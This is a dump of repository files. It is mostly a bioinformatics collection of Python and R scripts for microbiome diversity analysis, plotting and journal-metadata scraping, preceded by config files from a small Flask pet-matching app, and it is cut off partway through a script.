"license_type": "no_license",
"max_line_length": 64,
"num_lines": 9,
"path": "/.env.example",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "FLASK_ENV=development\n\nDATABASE_URL='postgresql://:@localhost/capstone_q3'\n\nSQLALCHEMY_DATABASE_URI = 'postgresql://:@localhost/capstone_q3'\n\nSQLALCHEMY_TRACK_MODIFICATIONS=0\n\nBREEDS_CSV=data/all_breeds.csv"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6974790096282959,
"avg_line_length": 16.414634704589844,
"blob_id": "cfe80bba42241228489775b401062b09124dda90",
"content_id": "ae05cf2352b2e859687f300c115c7d6bd0bae6e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 714,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 41,
"path": "/requirements.txt",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "alembic==1.4.3\nastroid==2.4.2\nattrs==20.3.0\nautopep8==1.5.4\nclick==7.1.2\nenvirons==9.3.0\nflake8==3.8.4\nFlask==1.1.2\nFlask-JWT-Extended==3.25.0\nflask-marshmallow==0.14.0\nFlask-Migrate==2.5.3\nFlask-SQLAlchemy==2.4.4\ngunicorn==20.0.4\niniconfig==1.1.1\nisort==5.7.0\nitsdangerous==1.1.0\nJinja2==2.11.2\nlazy-object-proxy==1.4.3\nMako==1.1.3\nMarkupSafe==1.1.1\nmarshmallow==3.10.0\nmarshmallow-sqlalchemy==0.24.1\nmccabe==0.6.1\npackaging==20.8\npluggy==0.13.1\npsycopg2-binary==2.8.6\npy==1.10.0\npycodestyle==2.6.0\npyflakes==2.2.0\nPyJWT==1.7.1\npylint==2.6.0\npyparsing==2.4.7\npytest==6.2.1\npython-dateutil==2.8.1\npython-dotenv==0.15.0\npython-editor==1.0.4\nsix==1.15.0\nSQLAlchemy==1.3.22\ntoml==0.10.2\nWerkzeug==1.0.1\nwrapt==1.12.1\n"
},
{
"alpha_fraction": 0.7369901537895203,
"alphanum_fraction": 0.7383966445922852,
"avg_line_length": 27.440000534057617,
"blob_id": "b3bb9a1ddeee8cfa26a50ae7c520b3d9e48dafb3",
"content_id": "badb12cbb212a38d259a475329a4c1eefb798bfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1422,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 50,
"path": "/app/__init__.py",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "from app.views.interest_views import bp_interest\nfrom app.views.photo_view import bp_photo\nfrom flask import Flask\nfrom flask_jwt_extended import JWTManager\nfrom app.models import db, ma, mg\nfrom secrets import token_hex\nfrom app.views.owner_views import bp_owner\nfrom app.views.dog_views import bp_dogs\n\nfrom app.views.home import bp_home\nfrom app.views.breed_views import bp_breed\nfrom app.views.authorization_view import bp_authorization\nfrom app.views.message_view import bp_message\nfrom app.views.conversation_view import bp_conversation\nfrom app.views.like_views import bp_like\n\nconfigs = {\n 'development': 'DevelopmentConfig',\n 'production': 'ProductionConfig',\n 'test': 'TestingConfig'\n}\n\n\ndef create_app(config='production'):\n\n app = Flask(__name__)\n app.config.from_object(f'config.{configs[config]}')\n app.config['JWT_SECRET_KEY'] = token_hex(16)\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = False\n JWTManager(app)\n\n db.init_app(app)\n mg.init_app(app, db)\n ma.init_app(app)\n\n app.register_blueprint(bp_owner)\n app.register_blueprint(bp_dogs)\n\n app.register_blueprint(bp_home)\n app.register_blueprint(bp_breed)\n\n app.register_blueprint(bp_authorization)\n app.register_blueprint(bp_message)\n app.register_blueprint(bp_conversation)\n\n app.register_blueprint(bp_like)\n app.register_blueprint(bp_photo)\n app.register_blueprint(bp_interest)\n\n return app\n"
}
] | 5 |
Nonewood/Bioinformatics | https://github.com/Nonewood/Bioinformatics | 0e2446945576c72ef9ba397fd80cd1b9c0b83f86 | 5e54522af24733565a0f71c1f468843cad08203d | d899cccc3c83b125c3c0910cafad0d9337e24628 | refs/heads/master | 2021-07-07T03:54:19.272097 | 2020-07-13T01:44:37 | 2020-07-13T01:44:37 | 137,748,051 | 16 | 5 | null | 2018-06-18T12:19:07 | 2020-05-21T03:31:40 | 2020-06-10T06:15:07 | Python | [
{
"alpha_fraction": 0.6674972176551819,
"alphanum_fraction": 0.6769102811813354,
"avg_line_length": 47.81081008911133,
"blob_id": "79340d4b9cdc9691d2385082c6daba56746faeda",
"content_id": "6d94937c78335dfcb09029ac12295c08134b3090",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3720,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 74,
"path": "/rat/beta/beta_diversity.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n#将总的距离文件按照组别分组并且生成用于画图的组间和组内的表格\nimport pandas as pd\nimport sys\nbeta_diversityfile = sys.argv[1]\noutdir = sys.argv[2]\npar = [beta_diversityfile,outdir]\nif not all (par):\n\tprint('you silly fool!')\n\texit()\n\ndt = pd.read_table(beta_diversityfile, header=0, index_col=0)\nexpose_diversity = dt.loc[dt.index.str.contains('-a') == False, dt.columns.str.contains('-a') == False] #这个用法比较巧妙,行名不包含'-a'的行;\nrecovery_diversity = dt.loc[dt.index.str.contains('-a'), dt.columns.str.contains('-a')] # 行名包含 '-a' 的行;\nFexpose_diversity = expose_diversity.loc[expose_diversity.index.str.contains('F\\d'),expose_diversity.columns.str.contains('F\\d')]\nMexpose_diversity = expose_diversity.loc[expose_diversity.index.str.contains('M\\d'),expose_diversity.columns.str.contains('M\\d')]\nFrecovery_diversity = recovery_diversity.loc[recovery_diversity.index.str.contains('F\\d'),recovery_diversity.columns.str.contains('F\\d')]\nMrecovery_diversity = recovery_diversity.loc[recovery_diversity.index.str.contains('M\\d'),recovery_diversity.columns.str.contains('M\\d')]\n\ndef distance_cal(dt,temp):\n\tdistance = dict()\n\tfor Id1 in dt.columns:\n\t\tfor Id2 in dt.columns:\n\t\t\tkey = Id1 + ':' + Id2\n\t\t\tkey_temp = Id2 + ':' + Id1\n\t\t\tvalue = dt.loc[Id1,Id2]\n\t\t\tif (key in distance) or (key_temp in distance):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdistance[key] = value\n\tACK_ACK = open(temp + '/ACK-ACK.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=ACK_ACK)\n\tEL_EL = open(temp +'/EL-EL.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=EL_EL)\n\tCig_Cig = open(temp + '/Cig-Cig.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=Cig_Cig)\n\tACK_EL = open(temp + '/ACK-EL.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=ACK_EL)\n\tACK_Cig = open(temp + '/ACK-Cig.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=ACK_Cig)\n\tEL_Cig = open(temp + '/EL-Cig.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=EL_Cig)\n\n\tfor key in distance:\n\t\tkey_split = key.split(':')\n\t\tif key_split[0] == key_split[1]:\n\t\t\tcontinue\n\t\tif key_split[0].startswith('ACK') and key_split[1].startswith('ACK'):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'ACK', file=ACK_ACK)\n\t\telif key_split[0].startswith('EL') and key_split[1].startswith('EL'):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'EL', file=EL_EL)\n\t\telif key_split[0].startswith('Cig') and key_split[1].startswith('Cig'):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'Cig', file=Cig_Cig)\n\t\telif (key_split[0].startswith('ACK') and key_split[1].startswith('EL')) or (key_split[0].startswith('EL') and key_split[1].startswith('ACK')):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'ACK-EL', file=ACK_EL)\n\t\telif (key_split[0].startswith('ACK') and key_split[1].startswith('Cig')) or (key_split[0].startswith('Cig') and key_split[1].startswith('ACK')):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'ACK-Cig', file=ACK_Cig)\n\t\telif (key_split[0].startswith('EL') and key_split[1].startswith('Cig')) or (key_split[0].startswith('Cig') and key_split[1].startswith('EL')):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'El-Cig', file=EL_Cig)\n\tACK_ACK.close()\n\tEL_EL.close()\n\tCig_Cig.close()\n\tACK_EL.close()\n\tACK_Cig.close()\n\tEL_Cig.close()\n\nimport re\nlst = ['Fexpose_diversity','Mexpose_diversity','Frecovery_diversity','Mrecovery_diversity']\ndts = 
[Fexpose_diversity,Mexpose_diversity,Frecovery_diversity,Mrecovery_diversity]\nfor index in range(len(lst)):\n\tif re.search('(.*)_diversity',lst[index]):\n\t\tmatch = re.search('(.*)_diversity',lst[index])\n\t\ttemp = outdir + '/' + match.group(1)\n\t\tdistance_cal(dts[index],temp)\n"
},
{
"alpha_fraction": 0.6474423408508301,
"alphanum_fraction": 0.6845536828041077,
"avg_line_length": 36.60377502441406,
"blob_id": "9b4d3d54ca5bc001dba1218cb3671a84f4bc1a66",
"content_id": "a0290f89606438e9d7de0b3e2f6f364c3d2ab645",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2496,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 53,
"path": "/爬虫/paper_information.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#输入文献网址,获取文献题目,杂志名称,影响因子,发表日期\n#V1 目前只适合 Nature + cell 系列杂志,其他待测试,因为每个杂志的网站代码写法不一样;\n#昨晚看了关注的博主的一段话,我觉得很有道理,自己还是太懒了,而且也太笨了;\n#人生苦短,一切遵守 KISS 原则。持续构建一套自己都觉得很爽的灵活够用的渗透测试方法论,需要借用的借用,需要脚本化的脚本化,需要 Web 化的 Web 化,需要工程化的工程化,需要产品化的产品化,需要赚钱的赚钱,需要开源的开源。这里有一个关键点:团队作战,共同进步:-)\n#共勉\n\n#nature 系列\nimport requests,re\nfrom bs4 import BeautifulSoup\nurl = 'https://www.nature.com/articles/s41467-020-14676-4'\nr = requests.get(url)\nsoup = BeautifulSoup(r.content, \"lxml\")\ncontent = soup.prettify()\nsoup_match = re.search('datetime=\"(.*?)\"', content) ## 非贪婪匹配\ndate = soup_match.group(1)\nname = soup.find(class_ = 'c-article-info-details').get_text().split('\\n')[1]\ntitle = soup.find(class_ = 'c-article-title u-h1').get_text().split('\\n')[0]\n\nimport pandas as pd\ndt = pd.read_table('IF_2019.txt', index_col = 1) # 这个文件每年更新,在当前目录下\nIF_dict = dt['Journal Impact Factor'].to_dict()\nfor x in IF_dict:\n match = re.search(name, x, flags=re.IGNORECASE)\n if match:\n IF = IF_dict[x]\n \nprint(title) \nprint(name + ' | IF:' + IF + ' | Date ' + date )\n\n\n# cell 系列\nimport requests,re\nfrom bs4 import BeautifulSoup\nurl = 'https://www.cell.com/cell/fulltext/S0092-8674(20)30160-4?_returnURL=https%3A%2F%2Flinkinghub.elsevier.com%2Fretrieve%2Fpii%2FS0092867420301604%3Fshowall%3Dtrue'\nr = requests.get(url)\nsoup = BeautifulSoup(r.content, \"lxml\")\n\ndate = soup.find(class_ = 'article-header__publish-date__value').get_text().split('\\n')[0]\nname_pre = soup.find(class_ = 'upsell-box__banner upsell-box__control').get_text().split('\\n')[0]\nname = re.sub('Subscribe to ','', name_pre)\ntitle = soup.find(class_ = 'article-header__title').get_text().split('\\n')[0]\n\nimport pandas as pd\ndt = pd.read_table('/Users/tongxueer/Documents/文献/IF_2019.txt', index_col = 1)\nIF_dict = dt['Journal Impact Factor'].to_dict()\nfor x in IF_dict:\n match = re.search(name, x, flags=re.IGNORECASE)\n if match:\n IF = IF_dict[x]\nprint(title) \nprint(name + ' | IF:' + IF + ' | Date ' + date )\n\n# Bioinformatic 这个杂志爬取失败....\n\n"
},
{
"alpha_fraction": 0.5891719460487366,
"alphanum_fraction": 0.7388535141944885,
"avg_line_length": 33.88888931274414,
"blob_id": "f152e32e5cbdcda3d78bc5c9a985afc9777916d4",
"content_id": "754ae419c6ded2adc5fe22607748dbbaee32d10b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 316,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 9,
"path": "/Paper_information/Paper_information.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/bash\n# doi\npython3 advanced_paper_informational.py -l \"10.1016/S0140-6736(19)32319-0\"\n\n# doi file, a list of doi, line break\n#python3 advanced_paper_informational.py -f doilist.txt\n\n# dowload the pdf, only support one doi in current version +.+, TBD\npython3 scihub.py -d \"10.1016/S0140-6736(19)32319-0\"\n"
},
{
"alpha_fraction": 0.6134020686149597,
"alphanum_fraction": 0.6211340427398682,
"avg_line_length": 34.272727966308594,
"blob_id": "7de099c4287c028e2b0028bb823ecda1765aeac4",
"content_id": "487adf47aa2de19939c78d7f134863b7aad8b8d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 11,
"path": "/Maaslin/config_generate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "import sys\ntsv = sys.argv[1]\nlast = int(sys.argv[2])\nwith open(tsv, 'r') as IN, open('generated_config', 'w') as out:\n\thead = IN.readline().strip('\\n').split('\\t')\n\tmetadata = head[last-1]\n\ttax = head[last]\n\tprint('Matrix: Metadata', file = out)\n\tprint('Read_PCL_Rows: -' + metadata, file = out)\n\tprint('\\nMatrix: Abundance', file = out)\n\tprint('Read_PCL_Rows: ' + tax + '-', file = out)\n"
},
{
"alpha_fraction": 0.6757369637489319,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 32.92307662963867,
"blob_id": "97d2460f36679b57b66e6c25952d6280ceef084b",
"content_id": "297de815de22c5fed4a8db175b3f4804cc3825ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 587,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 13,
"path": "/col_split.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 小脚本是什么鬼,涉及了某一列的分割,None 值的替换,计数,以及 uniques 功能\n#! /usr/bin/python3 \nimport pandas as pd\nfrom numpy import nan\n\ndf = pd.read_table('genome.list.filter.anno')\ntax = df['Taxonomy'].str.split(';', expand=True) # 按照分号将 'Taxonomy' 分割,并且储存成数据库格式\ntax.fillna(value=nan, inplace=True) # 将 None 替换为 Nan\nit2level= tax.count(axis=1) #按照列计数 \nid2level.unique() # unique 功能\n(id2level == 2).sum()\n(id2level == 6).sum()\n(id2level == 7).sum() # 统计门,属,种水平的基因数目\n"
},
{
"alpha_fraction": 0.6267003417015076,
"alphanum_fraction": 0.65546053647995,
"avg_line_length": 51.51020431518555,
"blob_id": "6849e777cb7b565025f506f4e09efeb33d00d043",
"content_id": "076a46d184985ce97fd362572dcb8d824cb56e7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 5154,
"license_type": "no_license",
"max_line_length": 340,
"num_lines": 98,
"path": "/rat/alpha_boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript\n#eg: Rscript alpha_boxplot.R expose_abd.txt Sample_information_detail.txt CK:E-liquid:Cigarette 67ab57:487eb3:d2382c \nlibrary(Rcpp,lib.loc=\"R_lib\")\nlibrary(tidyr,lib.loc=\"R_lib\")\nlibrary(tidyselect,lib.loc=\"R_lib\")\nArgs <- commandArgs(TRUE)\ninput = Args[1] # alpha diversity file, including number and shannon\ngroup = Args[2] # F_Sample_information_detail.xls\ngroup_list = Args[3] # E-liquid:Cigarette\ncolor_list = Args[4] # 487eb3:d2382c\nabd = read.table(input, header = T,sep = '\\t', row.names = 1, check.names = F)\ngroup = read.table(group, header = T,sep = '\\t', row.names = 1, check.names = F)\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nlegend_list = unlist(strsplit(group_list, \":\"))\nfilename_prefix= gsub(\":\", \"_\", group_list)\n\nlibrary(ggplot2)\nlibrary(ggpubr,lib.loc=\"/ifshk7/BC_PS/wangpeng7/R_lib\")\ndt = cbind(abd,group)\n# number boxplot\nnumber_diff = compare_means(number ~ Group, dt, method = \"wilcox.test\") ## default wilcox.test\nwrite.table(number_diff,file = paste(filename_prefix,\"_number_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(number_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) {\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n\tmy_comparisons[[row]] = diff_group\n}\nnumber_plot = ggplot(dt,aes(x=Group, y=number,colour=Group)) + geom_boxplot() + stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(dt$number)) + scale_color_manual(values= color_var) + labs(x=\"\", y = \"Number\") + scale_y_continuous(limits = c(min(dt$number), max(dt$number) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3,0, 0.1, 0.1), 'in'))\n} else {\nnumber_plot = ggplot(dt,aes(x=Group, y=number, colour=Group)) + geom_boxplot() + scale_color_manual(values= color_var) + labs(x=\"\", y = \"number\") +\n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3,0, 0.1, 0.1), 'in'))\n}\n# shannon boxplot\nshannon_diff = compare_means(shannon ~ Group, dt, method = \"wilcox.test\") \nwrite.table(shannon_diff,file = paste(filename_prefix,\"_shannon_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(shannon_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) {\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n \tdiff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\nshannon_plot = ggplot(dt,aes(x=Group, y=shannon, colour=Group)) + geom_boxplot()+ stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(dt$shannon)) + scale_color_manual(values= color_var) + labs(x=\"\", y = \"shannon\") + scale_y_continuous(limits 
= c(min(dt$shannon), max(dt$shannon) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3, 0.1, 0.1, 0), 'in')) # 上 右 下 左\n} else {\nshannon_plot = ggplot(dt,aes(x=Group, y=shannon, colour=Group)) + geom_boxplot() + scale_color_manual(values= color_var) + labs(x=\"\", y = \"shannon\") +\n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3, 0.1, 0.1, 0), 'in'))\n}\n#output\npdf(paste(filename_prefix,\"alpha_boxplot.pdf\",sep=\"\"),width=6,height=4)\nlibrary(grid)\nlibrary(\"gridBase\")\nplot.new()\nplotlayout <- grid.layout(nrow=1,ncol=2)\nvp1 <- viewport(layout.pos.col=1,,layout.pos.row=1)\nvp2 <- viewport(layout.pos.col=2,layout.pos.row=1)\npushViewport(viewport(layout=plotlayout))\npushViewport(vp1)\n#par(new=TRUE,fig=gridFIG(),mai=c(1.1,1,0.3,0.2))\npar(new=TRUE,fig=gridFIG())\nprint(number_plot,newpage=FALSE)\npopViewport()\n\npushViewport(vp2)\npar(new=TRUE,fig=gridFIG())\nprint(shannon_plot,newpage=FALSE)\npopViewport()\ndev.off()\n"
},
{
"alpha_fraction": 0.45807769894599915,
"alphanum_fraction": 0.626789391040802,
"avg_line_length": 74.15384674072266,
"blob_id": "773891e03d97c443255e3393b80147b94de3311f",
"content_id": "d4ce1076162cd5e2819078c82b61405d26032027",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1064,
"license_type": "no_license",
"max_line_length": 299,
"num_lines": 13,
"path": "/爬虫/eastmoney.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "## 爬东财深股通,很粗糙的版本...\nimport requests,re\nfrom bs4 import BeautifulSoup\nurl = 'http://push2.eastmoney.com/api/qt/clist/get?pn=1&pz=50&po=1&np=1&ut=b2884a393a59ad64002292a3e90d46a5&fltt=2&invt=2&fid=f62&fs=b:BK0804&stat=1&fields=f12,f14,f2,f3,f62,f184,f66,f69,f72,f75,f78,f81,f84,f87,f204,f205,f124&rt=53091671&cb=jQuery183020346281626049056_1592750139884&_=1592750150231'\nres = requests.get(url)\nsoup = BeautifulSoup(res.content, \"html.parser\")\ncontent = soup.get_text().split('},{')\n# f12, f14, f62 , f66, f72 , f78 ,f84\nprint('\\t'.join(['代码','名称', '主力净流入', '超大单净流入', '大单净流入', '中单净流入', '小单净流入']))\nfor x in content:\n match = re.search('\\\"f12\\\":\\\"(.*?)\\\".*\\\"f14\\\":\\\"(.*?)\\\".*\\\"f62\\\":(.*?),.*\\\"f66\\\":(.*?),.*\\\"f72\\\":(.*?),.*\\\"f78\\\":(.*?),.*\\\"f84\\\":(.*?),', x)\n (code, name, main, sup, big, mid, sml) = (match.group(1), match.group(2),match.group(3), match.group(4), match.group(5), match.group(6), match.group(7) )\n print('\\t'.join([code, name, main, sup, big, mid, sml])) \n"
},
{
"alpha_fraction": 0.6811320781707764,
"alphanum_fraction": 0.6937106847763062,
"avg_line_length": 36.85714340209961,
"blob_id": "413cab3ce629a101ba9dddb96c556372c99e11d1",
"content_id": "6f83f915c58e22d02fadf3f11512bfb86a4286c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1616,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 42,
"path": "/diversity.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,re,os,math\nimport pandas as pd\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nCalculate the diversity index based on abundance file with pandas, only include number and shannon so far.\nExample: python3 diversity.py -i GeneCatalog_profile.xls.gz\nTo be continued.\nmood:feel happy to do such things, do not need to think of bad things.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the abundance file.\")\nparser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\nabdfile = args.Input\noutdir = args.outdir if args.outdir else './'\nout = outdir + '/diversity.txt'\n\nif not abdfile:\n parser.print_help() # 如果不加参数,则打印 help 信息;\n exit()\n\nif abdfile.endswith('gz'):\n\tdf = pd.read_csv(abdfile, compression='gzip', header=0, sep='\\t')\nelse:\n\tdf = pd.read_csv(abdfile, header=0, sep='\\t')\n\ndf.columns.values[0] = 'geneID'\ndf = df.set_index('geneID')\nsampleNumber = (df!=0).sum(axis=1)\nindexSelect = sampleNumber.index[sampleNumber >= 81*0.1]\ndfSelect = df.loc[indexSelect]\ndfSelectSum = dfSelect.div(dfSelect.sum(axis=0), axis=1)\ndt = dfSelectSum\ngeneNumber = (dt!=0).sum(axis=0)\nshannon = dt.apply(lambda x: [-math.log(y)*y if y > 0 else 0 for y in x]).sum()\ndiversity = pd.concat([geneNumber, shannon], axis=1, keys=['number','shannon'])\ndiversity.to_csv(out, sep='\\t')\n"
},
{
"alpha_fraction": 0.6724637746810913,
"alphanum_fraction": 0.7014492750167847,
"avg_line_length": 30.363636016845703,
"blob_id": "f8eb2bd22a7dd9dfcaf7e51be49e65542a12925b",
"content_id": "e3cc8758bec7f0e3da7b2607ed204d2ab46e951e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 11,
"path": "/profileNorm.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#用来将丰度文件归一化\n#! /usr/bin/Rscript\n#usage Rscript **.R Rat_10gene_phylum_abundance_profile.xls phylumProfileTable.xls\nArgs = commandArgs()\ninput = Args[6]\noutput = Args[7]\ndt = read.table(input,header=T,sep=\"\\t\")\nrownames(dt) = dt[,1]\ndf = dt[,-1]\ndfNorm = t(t(df)/apply(df,2,sum))*100\nwrite.table(dfNorm,file=output,sep=\"\\t\",quote=F,col.names=NA)\n"
},
{
"alpha_fraction": 0.6819671988487244,
"alphanum_fraction": 0.687213122844696,
"avg_line_length": 31.446807861328125,
"blob_id": "9f395f51e37ef53b858947158acda04891729985",
"content_id": "ef1c6405dbb8f6e89971585a6ff7b575fd60f1f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1571,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 47,
"path": "/rat/beta/braycurtis.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# 计算 beta 多样性\nimport argparse,re,os,math\nimport pandas as pd\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nGenerate the bray-curtis distance matrix based on abundance file.\nExample: python3 braycurtis.py -i GeneCatalog_profile.xls.gz\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the abundance file.\")\nparser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\nabdfile = args.Input\noutdir = args.outdir if args.outdir else './'\nif not os.path.exists(outdir):\n\tos.makedirs(outdir)\nout = outdir + '/braycurtis.txt'\n\nif not abdfile:\n\tparser.print_help()\n\texit()\n\nif abdfile.endswith('gz'):\n\tdf = pd.read_csv(abdfile, compression='gzip', header=0, sep='\\t')\nelse:\n\tdf = pd.read_csv(abdfile, header=0, sep='\\t')\n\nfrom scipy.spatial import distance\nimport pandas as pd\ndt = pd.read_table(abdfile, index_col=0)\n#dt.index = dt['geneID']\n#dt.drop(['geneID'], axis=1, inplace=True) #好奇怪,我为什么要加这两行... 已然忘记了..\nwith open(out, 'w') as bray:\n\tprint('\\t' + '\\t'.join(dt.columns.values), file = bray)\n\tfor first in dt.columns.values:\n\t\tlst = list()\n\t\tlst.append(first)\n\t\tfor second in dt.columns.values:\n\t\t\tdis = distance.braycurtis(dt[first], dt[second])\n\t\t\tlst.append(str(dis))\n\t\tprint('\\t'.join(lst), file=bray)\n"
},
{
"alpha_fraction": 0.6630170345306396,
"alphanum_fraction": 0.6715328693389893,
"avg_line_length": 39.426231384277344,
"blob_id": "b97011fbee2e8e5bd38ef4f219b4bea9ce6204fd",
"content_id": "a2f1320ab155e52cddf4eed80e8adcbc04bd3d59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2556,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 61,
"path": "/rat/choose.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# 利用 python 筛选数据,主要是使用 dt.columns.str.contains 这个功能,屡试不爽,即可以正则匹配,又可以使用运算符!\nimport pandas as pd\nimport argparse,os,re\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nchoose columns of the file by characters in rownames or colnames\nExample: python3 split.py -i expose_genusProfileTable.xls -g Sample_information_detail.txt -s Cig-F:EL-F -o ./ \nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the abundance file.\", nargs='?') \nparser.add_argument('-g','--group', help = \"the group file.\", nargs='?')\nparser.add_argument('-s','--splitID', help = \"the character for spliting.\")\nparser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\nabdfile = args.Input\ngroupfile = args.group\nsplitlist = args.splitID\noptionpar = [abdfile,groupfile]\nif not any(optionpar):\n\tprint('\\nError:you need add abundance or group file!\\n')\n\tparser.print_help()\n\texit()\nif not splitlist:\n\tprint('\\nError:you need add split 